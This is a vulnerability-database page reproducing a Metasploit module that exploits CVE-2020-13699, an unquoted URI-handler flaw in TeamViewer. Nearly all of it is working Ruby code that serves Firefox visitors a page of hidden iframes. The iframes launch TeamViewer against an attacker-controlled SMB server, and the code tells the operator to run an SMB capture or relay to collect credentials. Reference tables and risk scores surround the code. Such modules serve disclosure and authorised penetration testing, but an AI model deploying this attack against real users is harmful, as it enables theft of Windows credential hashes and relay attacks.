TeamViewer Unquoted URI Handler SMB Redirect

🗓️ 31 Aug 2024 00:00:00Reported by h00die, Jeffrey Hofmann, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 172 Views

TeamViewer Unquoted URI Handler SMB Redirect. Exploits unquoted parameter call in TeamViewer URI handler to create SMB connection to attacker controlled I

Reporter	Title	Published	Views	Family All 15
ATTACKERKB	CVE-2020-13699	29 Jul 202000:00	–	attackerkb
Circl	CVE-2020-13699	8 Aug 202021:10	–	circl
CVE	CVE-2020-13699	29 Jul 202015:36	–	cve
Cvelist	CVE-2020-13699	29 Jul 202015:36	–	cvelist
Metasploit	TeamViewer Unquoted URI Handler SMB Redirect	19 Aug 202017:40	–	metasploit
NCSC	Vulnerability fixed in TeamViewer	11 Aug 202000:00	–	ncsc
NVD	CVE-2020-13699	29 Jul 202016:15	–	nvd
OpenVAS	TeamViewer Unqoted URI Handler Vulnerability (CVE 2020-13699) - Windows	16 Mar 202100:00	–	openvas
OSV	CVE-2020-13699	29 Jul 202016:15	–	osv
Prion	Cross site request forgery (csrf)	29 Jul 202016:15	–	prion

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Auxiliary::Report  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'TeamViewer Unquoted URI Handler SMB Redirect',  
'Description' => %q{  
This module exploits an unquoted parameter call within the Teamviewer  
URI handler to create an SMB connection to an attacker controlled IP.  
TeamViewer < 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870,  
12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3 are  
vulnerable.  
Only Firefox can be exploited by this vulnerability, as all other  
browsers encode the space after 'play' and before the SMB location,  
preventing successful exploitation.  
Teamviewer 15.4.4445, and 8.0.16642 were succssfully tested against.  
},  
'Author' => [  
'Jeffrey Hofmann <[email protected]>', # Vuln discovery, PoC, etc  
'h00die' # msf module  
],  
'License' => MSF_LICENSE,  
'References' => [  
[ 'URL', 'https://jeffs.sh/CVEs/CVE-2020-13699.txt' ],  
[ 'CVE', '2020-13699' ],  
[ 'URL', 'https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448' ]  
],  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'SideEffects' => [IOC_IN_LOGS],  
'Reliability' => []  
}  
)  
)  
  
register_options(  
[  
OptString.new('FILE_NAME', [false, 'Arbitrary tv file location', '\\teamviewer\\config.tvs']),  
OptString.new('SMB_SERVER', [true, 'SMB server IP address', '']),  
OptEnum.new('URI_HANDLER', [  
true, 'TeamViewer URI Handler', 'teamviewer10', [  
'teamviewer10',  
'teamviewer8', 'teamviewerapi', 'tvchat1', 'tvcontrol1', 'tvfiletransfer1', 'tvjoinv8',  
'tvpresent1', 'tvsendfile1', 'tvsqcustomer1', 'tvsqsupport1', 'tvvideocall1', 'tvvpn1'  
]  
])  
]  
)  
end  
  
def html_content  
# For some reason, tends to work best when double iframes. Single will pop up the 'open app' message, but tends to not connect.  
%(  
<html>  
<head></head>  
<body>  
<iframe style="height:1px;width:1px;" src="#{datastore['URI_HANDLER']}: --play \\\\#{datastore['SMB_SERVER']}#{datastore['FILE_NAME']}"></iframe>  
<iframe style="height:1px;width:1px;" src="#{datastore['URI_HANDLER']}: --play \\\\#{datastore['SMB_SERVER']}#{datastore['FILE_NAME']}"></iframe>  
</body>  
</html>  
)  
end  
  
def on_request_uri(cli, req)  
print_status("Request received for: #{req.uri}")  
  
ua = req.headers['User-Agent'].to_s  
  
unless ua.include?('Firefox')  
print_error('Target is not Firefox')  
return  
end  
  
print_status("Sending TeamViewer Link to #{ua}...")  
send_response_html(cli, html_content)  
end  
  
def run  
print_good("Please start an SMB capture/relay on #{datastore['SMB_SERVER']}")  
exploit  
end  
end  
`

31 Aug 2024 00:00Current

7.1High risk

Vulners AI Score7.1

CVSS 26.8

CVSS 3.18.8

EPSS0.72886